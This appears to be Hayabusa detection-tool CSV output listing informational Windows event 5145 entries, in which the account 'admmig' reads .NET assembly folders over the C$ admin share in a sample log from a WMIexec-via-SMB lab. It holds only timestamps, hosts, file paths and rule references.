2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
